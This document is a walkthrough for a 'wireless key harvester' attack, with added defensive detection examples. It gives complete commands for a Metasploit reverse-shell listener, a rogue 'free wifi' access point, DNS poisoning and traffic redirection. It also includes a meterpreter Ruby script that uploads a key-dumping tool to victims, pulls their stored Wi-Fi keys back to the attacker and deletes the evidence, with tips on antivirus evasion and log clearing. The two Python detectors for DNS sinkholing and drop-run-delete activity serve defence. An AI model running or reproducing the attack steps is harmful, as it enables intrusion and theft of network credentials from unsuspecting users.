Wireless key harvester

First we create our meterpreter exe. Check this page out:
http://synjunkie.blogspot.com/2008/10/metasploit-payloads-msfpayload.html

Set up our listener:
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
set AutoRunScript /home/hm/Desktop/http/wirelesskeyharvester.rb
set ExitOnSession false
show options
exploit -j

Next, set up our fake access point:
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v

Now we set up our DHCP server:
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart

Set up a web server to host our exploit (the original note says apache, but the commands below actually use lighttpd):
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'

DNS redirector -- in this case dnspoison:
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1

And that's it. Wait for victims to connect, or forcefully disconnect them using mdk!!!!!!
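From the defender's side, the network built above has a recognisable shape: every UDP packet (so every DNS query) is DNAT'ed to the gateway 10.0.0.1, the DNS redirector answers every name with that same address, and port 80 is pulled to the gateway too. A client or a monitoring probe can score observed DNS answers against that pattern. The following is an added example written for this page, not code from the paste or from any of the tools it names; the lease and DNS records are constructed sample data, and the "public-looking name" heuristic and the thresholds are assumptions you would tune for your own environment.

```python
import ipaddress

# Constructed sample observations (not captured from any real network): what a
# client joined to a rogue "free wifi" access point like the one above would see.
ROGUE_LEASE = {"gateway": "10.0.0.1", "dns_server": "10.0.0.1"}
ROGUE_DNS = [
    ("www.example.com", "10.0.0.1"),
    ("mail.example.net", "10.0.0.1"),
    ("cdn.example.org", "10.0.0.1"),
    ("updates.example.com", "10.0.0.1"),
    ("login.example.net", "10.0.0.1"),
    ("time.example.org", "10.0.0.1"),
]

# Constructed benign comparison: a home router that forwards DNS honestly.
NORMAL_LEASE = {"gateway": "192.168.1.1", "dns_server": "192.168.1.1"}
NORMAL_DNS = [
    ("www.example.com", "192.0.2.10"),
    ("mail.example.net", "198.51.100.7"),
    ("cdn.example.org", "203.0.113.9"),
    ("updates.example.com", "192.0.2.11"),
    ("login.example.net", "198.51.100.8"),
    ("router.local", "192.168.1.1"),
]

# Assumption: names under these suffixes are expected to resolve locally.
LOCAL_SUFFIXES = (".local", ".lan", ".home", ".internal")

# RFC 1918 ranges checked explicitly (ipaddress.is_private also covers the
# documentation ranges used in the sample data, which we do not want flagged).
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def _looks_public(name):
    return not name.lower().endswith(LOCAL_SUFFIXES)


def _is_rfc1918(addr):
    return any(addr in net for net in RFC1918)


def rogue_ap_indicators(lease, dns_responses, min_names=5, sinkhole_ratio=0.8):
    """Score DNS answers seen on a network against the sinkhole pattern.

    Returns a dict with the computed gateway-answer ratio and a list of
    indicator strings; an empty list means nothing matched.
    """
    gateway = ipaddress.ip_address(lease["gateway"])
    distinct = {}
    for name, answer in dns_responses:
        distinct.setdefault(name, set()).add(ipaddress.ip_address(answer))
    indicators = []

    # Indicator 1: a large share of distinct names all resolve to the gateway.
    # A DNAT-to-gateway rule for UDP plus a catch-all DNS responder produces
    # exactly this shape; honest resolvers return many different addresses.
    to_gateway = [n for n, answers in distinct.items() if gateway in answers]
    ratio = len(to_gateway) / len(distinct) if distinct else 0.0
    if len(distinct) >= min_names and ratio >= sinkhole_ratio:
        indicators.append(
            f"dns_sinkhole: {len(to_gateway)}/{len(distinct)} names resolve to gateway {gateway}"
        )

    # Indicator 2: public-looking names answered with RFC 1918 addresses.
    # Weak on its own (split-horizon corporate DNS does this legitimately).
    private_hits = sorted(
        n for n, answers in distinct.items()
        if _looks_public(n) and any(_is_rfc1918(a) for a in answers)
    )
    if private_hits:
        indicators.append(
            f"private_answers: {len(private_hits)} public-looking names resolve to private addresses"
        )

    return {"gateway": str(gateway), "sinkhole_ratio": round(ratio, 3), "indicators": indicators}


if __name__ == "__main__":
    for label, lease, dns in (("rogue", ROGUE_LEASE, ROGUE_DNS), ("normal", NORMAL_LEASE, NORMAL_DNS)):
        print(label, rogue_ap_indicators(lease, dns))
```

The sinkhole ratio is the strong signal; the private-answer count only corroborates it, because corporate split-horizon DNS also hands out RFC 1918 answers for internal names. Captive portals on legitimate hotspots show the same sinkhole shape until you authenticate, so a client-side check should re-evaluate after the portal step rather than alert once.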
--------------------------- harvester.rb ---------------------------------------
#
# Wireless key harvester using Wireless Key Viewer
require 'rex'

# Extract the host and port of the new session
host, port = session.tunnel_peer.split(':')
print_status("New session found on #{host}:#{port}...")

# bin -- the name of our exe
bin = "wkv.exe"
# output file of Wireless Key Viewer (random name)
out = Rex::Text.rand_text_alpha_upper(5) + ".txt"
# destination for the keys in txt format
dest = "/home/hm/Desktop/keys/"

# upload Wireless Key Viewer --- modify it to bypass AVs
print_status("Uploading Wireless Key Viewer")
sleep(1)
client.fs.file.upload_file("%SystemDrive%\\#{bin}", "/home/hm/Desktop/http/wkv.exe")
sleep(1)
print_status("Uploaded Wireless Key Viewer")
sleep(1)

# execute via cmd; the output file gets the random name chosen above
print_status("Executing Wireless Key Viewer")
client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
print_status("Wireless Key Viewer executed")
sleep(1)

# download the keys to our keys folder
print_status("Downloading keys to keys folder")
client.fs.file.download_file("#{dest}#{out}", "%SystemDrive%\\#{out}")
print_status("Downloaded keys to keys folder")

# delete the uploaded files -- we can also clear logs here if we want to
sleep(1)
print_status("Deleting uploaded files")
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{bin} ", nil, {'Hidden' => 'true'})
client.sys.process.execute("cmd.exe /c del %SystemDrive%\\#{out} ", nil, {'Hidden' => 'true'})
print_status("Have a nice day!!!!!!")
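On the host, the script above leaves a short, distinctive sequence in process-creation telemetry: an executable dropped directly under the system drive root is launched through cmd.exe with an export switch, and a few seconds later cmd.exe deletes that same file (and the output file) to cover its tracks. The function below pairs a drive-root execution with a later "del" of the same path. It is an added example for this page, not part of the paste or of any EDR product; the event records are constructed to resemble the fields a Sysmon event-ID-1 or EDR process-start record would carry, and it assumes %SystemDrive% expands to C:.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation events (not real telemetry). Timestamps are ISO 8601.
SAMPLE_EVENTS = [
    {"ts": "2024-01-01T10:00:00", "pid": 400, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"ts": "2024-01-01T10:00:05", "pid": 412, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\wkv.exe /stabular /QWERT.txt"},
    {"ts": "2024-01-01T10:00:06", "pid": 413, "image": r"C:\wkv.exe",
     "cmdline": r"C:\wkv.exe /stabular /QWERT.txt"},
    {"ts": "2024-01-01T10:00:09", "pid": 420, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c del C:\wkv.exe "},
    {"ts": "2024-01-01T10:00:09", "pid": 421, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c del C:\QWERT.txt "},
    {"ts": "2024-01-01T10:30:00", "pid": 500, "image": r"C:\Program Files\Editor\editor.exe",
     "cmdline": "editor.exe notes.txt"},
]

# An image path sitting directly under a drive root, e.g. c:\something.exe.
ROOT_EXE = re.compile(r"^[a-z]:\\[^\\]+\.exe$", re.I)
# A cmd.exe "del <absolute path>" command line (optional quotes around the path).
DEL_CMD = re.compile(r'\bdel\s+"?([a-z]:\\[^\\\s"]+)"?', re.I)


def _norm(s):
    # Assumption: %SystemDrive% is C:. cmd.exe expands the variable before the
    # child starts, so the child's own command line already shows the drive letter.
    return s.replace("%SystemDrive%", "C:").strip().lower()


def find_drop_run_delete(events, window_seconds=120):
    """Pair executables run from a drive root with a later cmd.exe 'del' of the same path.

    Returns one dict per match; an empty list means the pattern was not seen.
    """
    parsed = sorted(((datetime.fromisoformat(e["ts"]), e) for e in events), key=lambda p: p[0])

    # Index every process started from a drive-root path by its normalised image path.
    root_runs = {}
    for ts, e in parsed:
        image = _norm(e["image"])
        if ROOT_EXE.match(image):
            root_runs.setdefault(image, []).append((ts, e))

    matches = []
    for ts, e in parsed:
        if not _norm(e["image"]).endswith(r"\cmd.exe"):
            continue
        m = DEL_CMD.search(_norm(e["cmdline"]))
        if not m:
            continue
        target = m.group(1)
        for run_ts, run in root_runs.get(target, []):
            # Only a deletion that follows the execution within the window counts.
            if timedelta(0) <= ts - run_ts <= timedelta(seconds=window_seconds):
                matches.append({
                    "executable": target,
                    "run_pid": run["pid"],
                    "delete_pid": e["pid"],
                    "seconds_between": (ts - run_ts).total_seconds(),
                    # The export switch seen in the script above; a corroborating detail.
                    "export_switch": "/stabular" in _norm(run["cmdline"]),
                })
    return matches


if __name__ == "__main__":
    for hit in find_drop_run_delete(SAMPLE_EVENTS):
        print(hit)
```

Execution from a drive root is rare enough on managed endpoints that many teams alert on it alone; the delete pairing mostly serves to raise the severity and to give the responder the two PIDs to pivot on. The deleted output file is not paired here because it was never executed, so an analyst should also pull any "del" of a file created in the same window by the matched process.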